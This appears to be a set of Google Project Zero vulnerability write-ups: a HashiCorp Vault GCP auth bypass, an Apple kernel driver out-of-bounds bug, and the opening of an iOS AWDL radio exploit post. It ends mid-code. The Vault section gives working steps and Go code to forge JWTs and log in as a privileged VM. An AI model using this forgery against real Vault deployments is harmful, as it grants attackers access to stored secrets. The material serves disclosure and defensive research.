  • The service account in subject claim of the JWT token needs to exist. This is verified using the ServiceAccount GCP API which requires the iam.serviceAccounts.get permission in the project hosting the service account. As the attacker can just use a service account in their own project, it is straightforward to just grant this permission to the GCP identity Vault is running under or even allUsers.


Finally, AuthorizeGCE is called to grant or deny access. If the attacker impersonated a GCE instance with the right attributes (project, label, zones, ...), everything works out well and the attacker gets a valid session token back. The only auth restriction that can’t be bypassed is a hardcoded service account name, as this value will be equal to the attacker account and not the expected VM account name.


An end-to-end attack against a vulnerable configuration will look like this:

  1. Create a service account in a GCP project you control and generate a private key using gcloud: gcloud iam service-accounts keys create key.json --iam-account [email protected]

  2. Sign a JWT with a fake compute_engine claim describing an existing and privileged VM. See here for a simple proof-of-concept script that takes care of most of the details, and see the sketch after this list for what this signing step boils down to.

  3. Now simply use the token to sign-in to Vault: curl --request POST --data '{"role": "my-gce-role", "jwt" : "...."}' http://vault:8200/v1/auth/gcp/login
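
As referenced in step 2, a minimal sketch of the token forging step (using the third-party github.com/golang-jwt/jwt/v5 package; the service account email, key id, audience format and instance attributes are all placeholders) could look like this:

package main

import (
    "fmt"
    "os"
    "time"

    "github.com/golang-jwt/jwt/v5"
)

func main() {
    // key.json from step 1 contains the private key and its key id; assume the
    // PEM-encoded key has already been extracted into this file.
    pemBytes, err := os.ReadFile("sa-private-key.pem")
    if err != nil {
        panic(err)
    }
    priv, err := jwt.ParseRSAPrivateKeyFromPEM(pemBytes)
    if err != nil {
        panic(err)
    }

    now := time.Now()
    claims := jwt.MapClaims{
        // The subject must be the attacker's real service account, so that Vault
        // can fetch the matching public key via the GCP API.
        "sub": "attacker-sa@attacker-project.iam.gserviceaccount.com",
        // Placeholder audience; Vault's gcp auth method expects a vault/<role> style value.
        "aud": "vault/my-gce-role",
        "iat": now.Unix(),
        "exp": now.Add(15 * time.Minute).Unix(),
        // The forged claim: describe an existing, privileged GCE instance.
        "google": map[string]interface{}{
            "compute_engine": map[string]interface{}{
                "project_id":    "victim-prod-project",
                "zone":          "europe-west3-c",
                "instance_name": "vault",
            },
        },
    }

    token := jwt.NewWithClaims(jwt.SigningMethodRS256, claims)
    token.Header["kid"] = "KEY-ID-FROM-STEP-1" // placeholder key id
    signed, err := token.SignedString(priv)
    if err != nil {
        panic(err)
    }
    fmt.Println(signed)
}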


This is an interesting bug that requires some knowledge of GCP IAM to spot. The root cause seems to be the merging of two separate authentication flows into a single code path in the parseAndValidateJwt function, which makes it difficult to reason about all security requirements when writing or reviewing the code. At the same time, GCP makes it easy to shoot yourself in the foot by offering two types of JWT tokens with completely different security properties.
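
One way to make this trust boundary explicit (purely my own sketch of the underlying idea, not HashiCorp's actual fix) is to track which kind of key verified the token's signature and to only honour compute_engine claims when it was a Google-wide key:

package main

import (
    "errors"
    "fmt"
)

// computeEngineClaims mirrors, in simplified form, the google.compute_engine
// claims Vault reads from a GCE instance identity token.
type computeEngineClaims struct {
    ProjectID    string
    Zone         string
    InstanceName string
}

// keySource records which kind of key verified the JWT signature.
type keySource int

const (
    googleWideOAuthKey keySource = iota // GCE metadata tokens, signed by Google
    serviceAccountKey                   // iam tokens, signed by the account itself
)

// gceMetadataFromClaims only trusts compute_engine claims when the token was
// signed by Google itself, since a service account can put arbitrary claims
// into tokens it signs on its own behalf.
func gceMetadataFromClaims(src keySource, claims *computeEngineClaims) (*computeEngineClaims, error) {
    if claims == nil {
        return nil, nil
    }
    if src != googleWideOAuthKey {
        return nil, errors.New("GCE metadata claims in a token not signed by Google")
    }
    return claims, nil
}

func main() {
    forged := &computeEngineClaims{ProjectID: "victim-prod-project", Zone: "europe-west3-c", InstanceName: "vault"}
    if _, err := gceMetadataFromClaims(serviceAccountKey, forged); err != nil {
        fmt.Println("login rejected:", err)
    }
}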

Conclusion

This blog post describes two authentication vulnerabilities in HashiCorp Vault, “cloud-native” software for secret management. While Vault was clearly developed with security in mind and benefits from the memory safety and high-quality standard library of its implementation language Go, I was still able to identify two critical vulnerabilities in its unauthenticated attack surface.


In my experience, tricky vulnerabilities like this often exist where developers have to interact with external systems and services. A strong developer might be able to reason about all security boundaries, requirements and pitfalls of their own software, but it becomes very difficult once a complex external service comes into play. Modern cloud IAM solutions are powerful and often more secure than comparable on-premise solutions, but they come with their own security pitfalls and a high implementation complexity. As more and more companies move to the big cloud providers, familiarity with these technology stacks will become a key skill for security engineers and researchers and it is safe to assume that there will be a lot of similar issues in the next few years.


Finally, both discussed vulnerabilities demonstrate how difficult it is to write secure software. Even with memory-safe languages, strong cryptography primitives, static analysis and large fuzzing infrastructure, some issues can only be discovered by manual code review and an attacker mindset.


✇Google Project Zero

Oops, I missed it again!


Written by Brandon Azad, when working at Project Zero


This is a quick anecdotal post describing one of the more frustrating aspects of vulnerability research: realizing that you missed a bug that was staring you in the face only once you see the patched version!

Some suspicious code

After writing the oob_timestamp exploit, I spent some time trying to find another vulnerability to exploit. Typically, it's a lot easier to develop an exploit when you already have a research platform (read: another exploit) available to help with your analysis, for example by dumping kernel memory to ensure that your heap spray is placing objects at their intended locations. Developing an exploit blind, as I had done with voucher_swap, is much trickier. (For oob_timestamp, I relied on checkra1n to bootstrap the exploit on A11, and later expanded it to A13.) So, I thought it might be nice to chain my next exploit off of oob_timestamp to avoid having to re-bootstrap later.


As I had already spent a fair amount of time reversing the iOS 13.3 (17C54) kernelcache for oob_timestamp, I decided to continue that effort on a new user client. I wrote a small program to enumerate IOUserClient classes reachable from the app sandbox (inadvertently discovering another bug in the process) and looked for classes that I had not researched previously.


A quick primer for those less familiar with Apple kernels: Apple's kernel is called XNU, and IOKit is XNU's C++ framework for implementing drivers. An app in userspace can call IOServiceGetMatchingServices() to get handles to the drivers, but the app can't actually do much with the raw driver handle. Instead, the app needs to direct the driver to create a "user client" by calling IOServiceOpen(), passing the type of user client it wants. Since the user client is what provides most of the functionality to userspace, this is the step that is subject to a sandbox check, ensuring that the app is allowed to open the requested type of user client. Once the app has a handle to a user client for the driver, the app can interact with the user client by calling functions like IOConnectCallMethod() on the user client handle, specifying the "selector" (index) of the method the app wants to invoke. In the kernel, IOConnectCallMethod() will use the selector to index a table of methods provided by the user client, invoking the one requested.


As I was scanning for user clients I could open, one reachable class stood out: H11ANEInDirectPathClient, a user client of the H11ANEIn driver. I hadn't seen this class before, but some quick Googling showed that it wasn't open source, which suggested to me that the code had probably undergone substantially less security review, and hence probably had more low-hanging bugs in it, than the open-source parts of the kernel.


I discovered several interesting things in the process of reversing. First, H11ANEIn appeared to actually have 2 user clients: H11ANEInDirectPathClient (the one I had opened) and H11ANEInUserClient (which I could not open in the sandbox). Reading the strings in the method H11ANEIn::newUserClient(), it appeared that H11ANEInDirectPathClient is the less privileged version of H11ANEInUserClient, so it made sense that I could open the former but not the latter.


if ( type == 1 ) // H11ANEInDirectPathClient

{

    _os_log_internal(...,

        "%s : ... : Creating direct evaluate client\n",

        "virtual IOReturn H11ANEIn::newUserClient(...)");

    ...

}

else // H11ANEInUserClient

{

    _os_log_internal(...,

        "%s : ... : Creating default full-entitlement client\n",

        "virtual IOReturn H11ANEIn::newUserClient(...)");

    ...

}


The traditional starting point when looking for bugs in IOKit user clients is to look at the external methods that are provided. These are usually identifiable as tables of function pointers near the user client's vtable in the kernelcache image. Here are the external method tables I identified for the two user clients, curiously laid out back-to-back in the kernelcache rather than each near their respective vtable:



Also, I noticed something interesting when I looked at the cross-references to these two tables: it seemed like since the classes were basically identical except for one being a less-privileged version of the other, Apple had made the rather unusual decision to share the parts of the external method tables corresponding to shared functionality between the two user client types!


This was evident from how the ::externalMethod() methods of each user client accessed the overlapping parts of the external method tables. The H11ANEInDirectPathClient version:


int H11ANEInDirectPathClient::externalMethod(H11ANEInDirectPathClient *this, u32 selector, IOExternalMethodArguments *args, IOExternalMethodDispatch *method, void *target)

{

    if ( !target )

        target = this;

    if ( selector <= 33 )

        method = &H11ANEInDirectPathClient_ExternalMethods_34[selector];

    return IOUserClient::externalMethod(this, selector, args, method, target);

}


And the H11ANEInUserClient version:


int H11ANEInUserClient::externalMethod(H11ANEInUserClient *this, u32 selector, IOExternalMethodArguments *args, IOExternalMethodDispatch *method, void *target)

{

    if ( !target )

        target = this;

    if ( selector <= 33 )

        method = &H11ANEInUserClient_ExternalMethods_34[selector];

    return IOUserClient::externalMethod(this, selector, args, method, target);

}


Since each can access 34 methods and the first 3 in the array are reserved for H11ANEInDirectPathClient, this meant that the last 3 would be reserved for H11ANEInUserClient, which seemed to check out since there were 37 methods total. Neat.


So, I started digging into the methods accessible by H11ANEInDirectPathClient, and very quickly adopted the opinion that the code quality in this driver was not very high. For example, I found that the 3500-line method H11ANEIn::ANE_ProgramSendRequest_gated(), reachable through selectors 2 and 33, exhibited some pretty trivial out-of-bounds reads right at the top of the function:



Here, the content of args is fully controlled, so the args->totInputBuffers count can be arbitrarily high, past the ends of the inputBufferSymbolIndex and inputBufferSurfaceId arrays.


Since the code quality seemed to be low, and since I was not particularly keen on untangling multi-thousand-line functions, I also tried to perform some very trivial fuzzing. My fuzzing experience was quite limited, but I had long ago written a dumb fuzzer that just blindly calls IOConnectCallMethod() from userspace passing randomly generated values; surprisingly, this had been sufficient before to find real kernel vulnerabilities. So, I decided to revive that old fuzzer and point it at H11ANEInDirectPathClient.


Within one second of launching the fuzzer app, the device panicked.


I was of course quite excited at this development, but it turned out that the bug was a pretty trivial NULL pointer dereference; not exploitable on iOS. And further fuzzing didn't seem to trigger anything else interesting. So, with other more interesting projects mounting, I sent a quick non-security report to Apple alerting that this area of the code could be problematic and then turned away from H11ANEInDirectPathClient.

Once more, with symbols

Fast forward to the end of August.


As had happened before with the iOS 12 beta, Apple had accidentally included a symbolicated kernelcache in some of the iOS 14 beta releases. I hadn't had a chance to dig into them yet, but I figured that the addition of symbols (and in particular the limited type information that could be inferred from mangled C++ method names) would make reversing the web of multi-thousand-line H11ANEIn functions faster and thus more worthwhile. So, I opened IDA and jumped once again to the external method tables to see if there were any obvious changes.


But almost immediately, something about the external method tables caught my eye:



Oddly, the external method tables for both H11ANEInDirectPathClient and H11ANEInUserClient had defined symbols. This was weird: I had expected the code would consist of a single array of IOExternalMethodDispatch structs, so that H11ANEInDirectPathClient could claim the 34 methods starting at index 0 while H11ANEInUserClient could claim the 34 methods starting at index 3. In such an arrangement, there should only be one symbol, that for the array as a whole.


Then it dawned on me: my notion of overlapping external method arrays was nonsense, and the "sharing" of external methods was a simple out-of-bounds access by H11ANEInDirectPathClient! The less privileged client was supposed to only have 3 methods, but it just so happened that there was a typo in the bounds-check, allowing H11ANEInDirectPathClient to access and call external methods from the more privileged client. And in so doing, each call by H11ANEInDirectPathClient to an H11ANEInUserClient method was implicitly triggering a type confusion on the this pointer!


In hindsight, I realized that the "sharing external method arrays" arrangement made no sense: any such use would have to be careful to avoid type confusion between the two classes of user clients, and no such precaution was taking place. This conviction was confirmed when I decompiled H11ANEInDirectPathClient::externalMethod() in the new kernelcache and saw that the bounds check on the selector had decreased from 33 to 2, meaning the bug was now patched.


So, I had missed an issue staring me in the face the whole time, whose existence I had justified by inventing a concept of overlapping method tables. And of course, to add insult to injury, the NULL pointer dereferences I had reported as a non-security issue were only reached by calling two of the out-of-bounds methods.

Another recipe for copypasta

How might this bug have come to exist in the first place? Since the buggy version included the same bounds check for both ::externalMethod() implementations, I suspect this was another case of a copy-paste bug. Here's my guess for what H11ANEInUserClient::externalMethod() actually looks like in Apple's source:


IOReturn H11ANEInUserClient::externalMethod(

    u32 selector, IOExternalMethodArguments *args,

    IOExternalMethodDispatch *method, void *target)

{

    if ( !target )

        target = this;

    if ( selector < H11ANEInUserClient::sMethodCount )

        method = &H11ANEInUserClient::sMethods[selector];

    return super::externalMethod(this, selector, args, method, target);

}


My guess is that this code was copy-pasted to create the H11ANEInDirectPathClient version, but the author accidentally forgot to change the type name in the selector check:


IOReturn H11ANEInDirectPathClient::externalMethod(

    u32 selector, IOExternalMethodArguments *args,

    IOExternalMethodDispatch *method, void *target)

{

    if ( !target )

        target = this;

    if ( selector < H11ANEInUserClient::sMethodCount )

        method = &H11ANEInDirectPathClient::sMethods[selector];

    return super::externalMethod(this, selector, args, method, target);

}


Aside from that, it's mostly a convenient accident that the compiler laid the external method tables back-to-back, making this bug plausibly exploitable (as opposed to past cases of out-of-bounds external methods that I'm aware of). That said, I have not examined the actual exploitability of this issue.

Conclusion

So, what are the takeaways from this story?


First, it's really easy to miss bugs, even ones that you feel should have been obvious. I kicked myself for missing this, given the mental gymnastics I went through to justify why a code pattern like this could exist in the first place. If there's one lesson I've had to teach myself again and again, it's to be inherently suspicious of code and to never assume that it's doing what it does on purpose.


Second, copy-paste is a really quick way to create code, but it's also a quick way to create subtle bugs that, by their nature, are tricky to spot by glancing at the source code. It's easy to tell that 2 arrays are "overlapping" by looking in a disassembler, but it's harder to see that the wrong one of two very similar class names was used in copy-pasted code. While it doesn't solve the problem 100%, it can help to decompose copy-pasted code patterns into reusable helper functions.


Finally, even though I only realized that there was a bug when I looked at the symbolicated kernelcache, I don't want Apple to get the impression that releasing symbols is a security risk. Security researchers rejoice when Apple accidentally releases symbolicated kernelcaches or development libraries, but this is just because it saves time reversing, not because it makes things newly reversible. Any capable attacker will find bugs regardless of the presence or absence of symbols; all the lack of symbols does is keep the bug away from eyes (like mine) that might report it. Hence, withholding symbols is an incredibly weak protection, only deterring the lowest tiers of attackers and serving to make the bugs that have been found last longer.


✇Google Project Zero

An iOS zero-click radio proximity exploit odyssey


Posted by Ian Beer, Project Zero


NOTE: This specific issue was fixed before the launch of Privacy-Preserving Contact Tracing in iOS 13.5 in May 2020.


In this demo I remotely trigger an unauthenticated kernel memory corruption vulnerability which causes all iOS devices in radio-proximity to reboot, with no user interaction. Over the next 30'000 words I'll cover the entire process to go from this basic demo to successfully exploiting this vulnerability in order to run arbitrary code on any nearby iOS device and steal all the user data.

Introduction

Quoting @halvarflake's Offensivecon keynote from February 2020:


"Exploits are the closest thing to "magic spells" we experience in the real world: Construct the right incantation, gain remote control over device."


For 6 months of 2020, while locked down in the corner of my bedroom surrounded by my lovely, screaming children, I've been working on a magic spell of my own. No, sadly not an incantation to convince the kids to sleep in until 9am every morning, but instead a wormable radio-proximity exploit which allows me to gain complete control over any iPhone in my vicinity. View all the photos, read all the email, copy all the private messages and monitor everything which happens on there in real-time. 


The takeaway from this project should not be: no one will spend six months of their life just to hack my phone, I'm fine.


Instead, it should be: one person, working alone in their bedroom, was able to build a capability which would allow them to seriously compromise iPhone users they'd come into close contact with.


Imagine the sense of power an attacker with such a capability must feel. As we all pour more and more of our souls into these devices, an attacker can gain a treasure trove of information on an unsuspecting target.


What's more, with directional antennas, higher transmission powers and sensitive receivers the range of such attacks can be considerable.


I have no evidence that these issues were exploited in the wild; I found them myself through manual reverse engineering. But we do know that exploit vendors seemed to take notice of these fixes. For example, take this tweet from Mark Dowd, the co-founder of Azimuth Security, an Australian "market-leading information security business":



This tweet from @mdowd on May 27th 2020 mentioned a double free in BSS reachable via AWDL


The vulnerability Mark is referencing here is one of the vulnerabilities I reported to Apple. You don't notice a fix like that without having a deep interest in this particular code.


This Vice article from 2018 gives a good overview of Azimuth and why they might be interested in such vulnerabilities. You might trust that Azimuth's judgement of their customers aligns with your personal and political beliefs, you might not, that's not the point. Unpatched vulnerabilities aren't like physical territory, occupied by only one side. Everyone can exploit an unpatched vulnerability and Mark Dowd wasn't the only person to start tweeting about vulnerabilities in AWDL.


This has been the longest solo exploitation project I've ever worked on, taking around half a year. But it's important to emphasize up front that the teams and companies supplying the global trade in cyberweapons like this one aren't typically just individuals working alone. They're well-resourced and focused teams of collaborating experts, each with their own specialization. They aren't starting with absolutely no clue how bluetooth or wifi work. They also potentially have access to information and hardware I simply don't have, like development devices, special cables, leaked source code, symbols files and so on.


Of course, an iPhone isn't designed to allow people to build capabilities like this. So what went so wrong that it was possible? Unfortunately, it's the same old story. A fairly trivial buffer overflow programming error in C++ code in the kernel parsing untrusted data, exposed to remote attackers.


In fact, this entire exploit uses just a single memory corruption vulnerability to compromise the flagship iPhone 11 Pro device. With just this one issue I was able to defeat all the mitigations in order to remotely gain native code execution and kernel memory read and write.


Relative to the size and complexity of these codebases of major tech companies, the sizes of the security teams dedicated to proactively auditing their product's source code to look for vulnerabilities are very small. Android and iOS are complete custom tech stacks. It's not just kernels and device drivers but dozens of attacker-reachable apps, hundreds of services and thousands of libraries running on devices with customized hardware and firmware.


Actually reading all the code, including every new line in addition to the decades of legacy code, is unrealistic, at least with the division of resources commonly seen in tech where the ratio of security engineers to developers might be 1:20, 1:40 or even higher.


To tackle this insurmountable challenge, security teams rightly place a heavy emphasis on design level review of new features. This is sensible: getting stuff right at the design phase can help limit the impact of the mistakes and bugs which will inevitably occur. For example, ensuring that a new hardware peripheral like a GPU can only ever access a restricted portion of physical memory helps constrain the worst-case outcome if the GPU is compromised by an attacker. The attacker is hopefully forced to find an additional vulnerability to "lengthen the exploit chain", having to use an ever-increasing number of vulnerabilities to hack a single device. Retrofitting constraints like this to already-shipping features would be much harder, if not impossible.


In addition to design-level reviews, security teams tackle the complexity of their products by attempting to constrain what an attacker might be able to do with a vulnerability. These are mitigations. They take many forms and can be general, like stack cookies, or application-specific, like Structure ID in JavaScriptCore. The guarantees which can be made by mitigations are generally weaker than those made by design-level features but the goal is similar: to "lengthen the exploit chain", hopefully forcing an attacker to find a new vulnerability and incur some cost.


The third approach widely used by defensive teams is fuzzing, which attempts to emulate an attacker's vulnerability finding process with brute force. Fuzzing is often misunderstood as an effective method to discover easy-to-find vulnerabilities or "low-hanging fruit". A more precise description would be that fuzzing is an effective method to discover easy-to-fuzz vulnerabilities. Plenty of vulnerabilities which a skilled vulnerability researcher would consider low-hanging fruit can require reaching a program point that no fuzzer today will be able to reach, no matter the compute resources used.


The problem for tech companies, and certainly not unique to Apple, is that while design review, mitigations, and fuzzing are necessary for building secure codebases, they are far from sufficient.


Fuzzers cannot reason about code in the same way a skilled vulnerability researcher can. This means that without concerted manual effort, vulnerabilities with a relatively low cost-of-discovery remain fairly prevalent. A major focus of my work over the last few years has been attempting to highlight that the iOS codebase, just like any other major modern operating system, has a high vulnerability density. Not only that, but there's a high density of "good bugs", that is, vulnerabilities which enable the creation of powerful weird machines.


This notion of "good bugs" is something that offensive researchers understand intuitively but something which might be hard to grasp for those without an exploit development background. Thomas Dullien's weird machines paper provides the best introduction to the notion of weird machines and their applicability to exploitation. Given a sufficiently complex state machine operating on attacker-controlled input, a "good bug" allows the attacker-controlled input to instead become "code", with the "good bug" introducing a new, unexpected state transition into a new, unintended state machine. The art of exploitation then becomes the art of determining how one can use vulnerabilities to introduce sufficiently powerful new state transitions such that, as an end goal, the attacker-supplied input becomes code for a new, weird machine capable of arbitrary system interactions.


It's with this weird machine that mitigations will be defeated; even a mitigation without implementation flaws is usually no match for a sufficiently powerful weird machine. An attacker looking for vulnerabilities is looking specifically for weird machine primitives. Their auditing process is focused on a particular attack-surface and particular vulnerability classes. This stands in stark contrast to a product security team with responsibility for every possible attack surface and every vulnerability class.


As things stand now in November 2020, I believe it's still quite possible for a motivated attacker with just one vulnerability to build a sufficiently powerful weird machine to completely, remotely compromise top-of-the-range iPhones. In fact, the parts of that process which are hardest probably aren't those which you might expect, at least not without an appreciation for weird machines.


Vulnerability discovery remains a fairly linear function of time invested. Defeating mitigations remains a matter of building a sufficiently powerful weird machine. Concretely, Pointer Authentication Codes (PAC) meant I could no longer take the popular direct shortcut to a very powerful weird machine via trivial program counter control and ROP or JOP. Instead I built a remote arbitrary memory read and write primitive which in practice is just as powerful and something which the current implementation of PAC, which focuses almost exclusively on restricting control-flow, wasn't designed to mitigate.


Secure system design didn't save the day because of the inevitable tradeoffs involved in building shippable products. Should such a complex parser driving multiple, complex state machines really be running in kernel context against untrusted, remote input? Ideally, no, and this was almost certainly flagged during a design review. But there are tight timing constraints for this particular feature which means isolating the parser is non-trivial. It's certainly possible, but that would be a major engineering challenge far beyond the scope of the feature itself. At the end of the day, it's features which sell phones and this feature is undoubtedly very cool; I can completely understand the judgement call which was made to allow this design despite the risks.


But risk means there are consequences if things don't go as expected. When it comes to software vulnerabilities it can be hard to connect the dots between those risks which were accepted and the consequences. I don't know if I'm the only one who found these vulnerabilities, though I'm the first to tell Apple about them and work with Apple to fix them. Over the next 30'000 words I'll show you what I was able to do with a single vulnerability in this attack surface and hopefully give you a new or renewed insight into the power of the weird machine.


I don't think all hope is lost; there's just an awful lot more left to do. In the conclusion I'll try to share some ideas for what I think might be required to build a more secure iPhone.


If you want to follow along you can find details attached to issue 1982 in the Project Zero issue tracker.

Vulnerability discovery

In 2018 Apple shipped an iOS beta build without stripping function name symbols from the kernelcache. While this was almost certainly an error, events like this help researchers on the defending side enormously. One of the ways I like to procrastinate is to scroll through this enormous list of symbols, reading bits of assembly here and there. One day I was looking through IDA's cross-references to memmove with no particular target in mind when something jumped out as being worth a closer look:


IDA Pro's cross references window shows a large number of calls to memmove. A callsite in IO80211AWDLPeer::parseAwdlSyncTreeTLV is highlighted


Having function names provides a huge amount of missing context for the vulnerability researcher. A completely stripped 30+MB binary blob such as the iOS kernelcache can be overwhelming. There's a huge amount of work to determine how everything fits together. What bits of code are exposed to attackers? What sanity checking is happening and where? What execution context are different parts of the code running in?


In this case this particular driver is also available on MacOS, where function name symbols are not stripped.


There are three things which made this highlighted function stand out to me:


1) The function name:


IO80211AWDLPeer::parseAwdlSyncTreeTLV


At this point, I had no idea what AWDL was. But I did know that TLVs (Type, Length, Value) are often used to give structure to data, and parsing a TLV might mean it's coming from somewhere untrusted. And the 80211 is a giveaway that this probably has something to do with WiFi. Worth a closer look. Here's the raw decompilation from Hex-Rays which we'll clean up later:


__int64 __fastcall IO80211AWDLPeer::parseAwdlSyncTreeTLV(__int64 this, __int64 buf)

{

  const void *v3; // x20

  _DWORD *v4; // x21

  int v5; // w8

  unsigned __int16 v6; // w25

  unsigned __int64 some_u16; // x24

  int v8; // w21

  __int64 v9; // x8

  __int64 v10; // x9

  unsigned __int8 *v11; // x21

 

  v3 = (const void *)(buf + 3);

  v4 = (_DWORD *)(this + 1203);

  v5 = *(_DWORD *)(this + 1203);

  if ( ((v5 + 1) & 0xFFFFu) <= 0xA )

    v6 = v5 + 1;

  else

    v6 = 10;

  some_u16 = *(unsigned __int16 *)(buf + 1) / 6uLL;

  if ( (_DWORD)some_u16 == v6 )

  {

    some_u16 = v6;

  }

  else

  {

    IO80211Peer::logDebug(

      this,

      0x8000000000000uLL,

      "Peer %02X:%02X:%02X:%02X:%02X:%02X: PATH LENGTH error hc %u calc %u \n",

      *(unsigned __int8 *)(this + 32),

      *(unsigned __int8 *)(this + 33),

      *(unsigned __int8 *)(this + 34),

      *(unsigned __int8 *)(this + 35),

      *(unsigned __int8 *)(this + 36),

      *(unsigned __int8 *)(this + 37),

      v6,

      some_u16);

    *v4 = some_u16;

    v6 = some_u16;

  }

  v8 = memcmp((const void *)(this + 5520), v3, (unsigned int)(6 * some_u16));

  memmove((void *)(this + 5520), v3, (unsigned int)(6 * some_u16));


Definitely looks like it's parsing something. There's some fiddly byte manipulation; something which sort of looks like a bounds check and an error message.


2) The second thing which stands out is the error message string:


"Peer %02X:%02X:%02X:%02X:%02X:%02X: PATH LENGTH error hc %u calc %u\n" 


Any kind of LENGTH error sounds like fun to me. Especially when you look a little closer...


3) The control flow graph.


Reading the code a bit more closely it appears that although the log message contains the word "error" there's nothing which is being treated as an error condition here. IO80211Peer::logDebug isn't a fatal logging API, it just logs the message string. Tracing back the length value which is passed to memmove, regardless of which path is taken we still end up with what looks like an arbitrary u16 value from the input buffer (rounded down to the nearest multiple of 6) passed as the length argument to memmove.


Can it really be this easy? Typically, in my experience, bugs this shallow in real attack surfaces tend to not work out. There's usually a length check somewhere far away; you'll spend a few days trying to work out why you can't seem to reach the code with a bad size until you find it and realize this was a CVE from a decade ago. Still, worth a try.


But what even is this attack surface?

A first proof-of-concept

A bit of googling later we learn that awdl is a type of Welsh poetry, and also an acronym for an Apple-proprietary mesh networking protocol probably called Apple Wireless Direct Link. It appears to be used by AirDrop amongst other things.


The first goal is to determine whether we can really trigger this vulnerability remotely.


We can see from the casts in the parseAwdlSyncTreeTLV method that the type-length-value objects have a single-byte type then a two-byte length followed by a payload value.
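
To make that layout concrete, here's a minimal sketch of the TLV wire format implied by those casts (the struct and field names are mine, not Apple's):

#include <stdint.h>

/* Sketch of the AWDL TLV layout as read by the parser: a one-byte type,
   a two-byte length, then a variable-length payload. */
struct awdl_tlv {
  uint8_t  type;    /* e.g. 0x14 for the SyncTree TLV */
  uint16_t length;  /* length of val in bytes */
  uint8_t  val[];   /* variable-length payload */
} __attribute__((packed));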


In IDA selecting the function name and going View -> Open subviews -> Cross references (or pressing 'x') shows IDA only found one caller of this method:


IO80211AWDLPeer::actionFrameReport

...

      case 0x14u:

        if (v109[20] >= 2)

          goto LABEL_126;

        ++v109[0x14];

        IO80211AWDLPeer::parseAwdlSyncTreeTLV(this, bytes);


So 0x14 is probably the type value, and v109 looks like it's probably counting the number of these TLVs.


Looking in the list of function names we can also see that there's a corresponding BuildSyncTreeTlv method. If we could get two machines to join an AWDL network, could we just use the MacOS kernel debugger to make the SyncTree TLV very large before it's sent?


Yes, you can. Using two MacOS laptops and enabling AirDrop on both of them I used a kernel debugger to edit the SyncTree TLV sent by one of the laptops, which caused the other one to kernel panic due to an out-of-bounds memmove.


If you're interested in exactly how to do that take a look at the original vulnerability report I sent to Apple on November 29th 2019. This vulnerability was fixed as CVE-2020-3843 on January 28th 2020 in iOS 13.3.1/MacOS 10.15.3.


Our journey is only just beginning. Getting from here to running an implant on an iPhone 11 Pro with no user interaction is going to take a while...

Prior Art

There are a series of papers from the Secure Mobile Networking Lab at TU Darmstadt in Germany (also known as SEEMOO) which look at AWDL. The researchers there have done a considerable amount of reverse engineering (in addition to having access to some leaked Broadcom source code) to produce these papers; they are invaluable to understand AWDL and pretty much the only resources out there. 


The first paper One Billion Apples’ Secret Sauce: Recipe for the Apple Wireless Direct Link Ad hoc Protocol covers the format of the frames used by AWDL and the operation of the channel-hopping mechanism.


The second paper A Billion Open Interfaces for Eve and Mallory: MitM, DoS, and Tracking Attacks on iOS and macOS Through Apple Wireless Direct Link focuses more on AirDrop, one of the OS features which uses AWDL. This paper also examines how AirDrop uses Bluetooth Low Energy advertisements to enable AWDL interfaces on other devices.


The research group wrote an open source AWDL client called OWL (Open Wireless Link). Although I was unable to get OWL to work it was nevertheless an invaluable reference and I did use some of their frame definitions.

What is AWDL?

AWDL is an Apple-proprietary mesh networking protocol designed to allow Apple devices like iPhones, iPads, Macs and Apple Watches to form ad-hoc peer-to-peer mesh networks. Chances are that if you own an Apple device you're creating or connecting to these transient mesh networks multiple times a day without even realizing it.


If you've ever used AirDrop, streamed music to your HomePod or Apple TV via AirPlay or used your iPad as a secondary display with Sidecar then you've been using AWDL. And even if you haven't been using those features, if people nearby have been then it's quite possible your device joined the AWDL mesh network they were using anyway.


AWDL isn't a custom radio protocol; the radio layer is WiFi (specifically 802.11g and 802.11a). 


Most people's experience with WiFi involves connecting to an infrastructure network. At home you might plug a WiFi access point into your modem which creates a WiFi network. The access point broadcasts a network name and accepts clients on a particular channel.


To reach other devices on the internet you send WiFi frames to the access point (1). The access point sends them to the modem (2) and the modem sends them to your ISP (3,4) which sends them to the internet:



The topology of a typical home network


To reach other devices on your home WiFi network you send WiFi frames to the access point and the access point relays them to the other devices:


WiFi clients communicate via an access point, even if they are within WiFi range of each other


In reality the wireless signals don't propagate as straight lines between the client and access point but spread out in space such that the two client devices may be able to see the frames transmitted by each other to the access point.


If WiFi client devices can already send WiFi frames directly to each other, then why have the access point at all? Without the complexity of the access point you could certainly have much more magical experiences which "just work", requiring no physical setup.


There are various protocols for doing just this, each with their own tradeoffs. Tunneled Direct Link Setup (TDLS) allows two devices already on the same WiFi network to negotiate a direct connection to each other such that frames won't be relayed by the access point.


Wi-Fi Direct allows two devices not already on the same network to establish an encrypted peer-to-peer Wi-Fi network, using WPS to bootstrap a WPA2-encrypted ad-hoc network.


Apple's AWDL doesn't require peers to already be on the same network to establish a peer-to-peer connection, but unlike Wi-Fi Direct, AWDL has no built-in encryption. Unlike TDLS and Wi-Fi Direct, AWDL networks can contain more than two peers and they can also form a mesh network configuration where multiple hops are required.


AWDL has one more trick up its sleeve: an AWDL client can be connected to an AWDL mesh network and a regular AP-based infrastructure network at the same time, using only one Wi-Fi chipset and antenna. To see how that works we need to look a little more at some Wi-Fi fundamentals.



                                     TDLS    Wi-Fi Direct    AWDL
Requires AP network                  Yes     No              No
Encrypted                            Yes     Yes             No
Peer Limit                           2       2               Unlimited
Concurrent AP Connection Possible    No      No              Yes

WiFi fundamentals

There are over 20 years of WiFi standards spanning different frequency ranges of the electromagnetic spectrum, from as low as 54 MHz in 802.11af up to over 60 GHz in 802.11ad. Such networks are quite esoteric, though; consumer equipment uses frequencies near 2.4 GHz or 5 GHz. Ranges of frequencies are split into channels: for example, in 802.11g channel 6 means a 22 MHz range between 2.426 GHz and 2.448 GHz.


Newer 5 GHz standards like 802.11ac allow for wider channels up to 160 MHz; 5 GHz channel numbers therefore encode both the center frequency and channel width. Channel 44 is a 20 MHz range between 5.210 GHz and 5.230 GHz whereas channel 46 is a 40 MHz range which starts at the same lower frequency of 5.210 GHz as channel 44 but extends up to 5.250 GHz.
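
For reference, the usual 802.11 mapping from channel number to center frequency can be computed in a couple of lines; this is a generic sketch of that formula, not code from any driver:

#include <stdio.h>

/* Usual 802.11 channel-number to center-frequency mapping in MHz.
   Channel width is not encoded here. */
static int channel_center_mhz(int channel) {
  if (channel >= 1 && channel <= 13)
    return 2407 + 5 * channel;   /* channel 6 -> 2437 MHz (2.437 GHz) */
  if (channel == 14)
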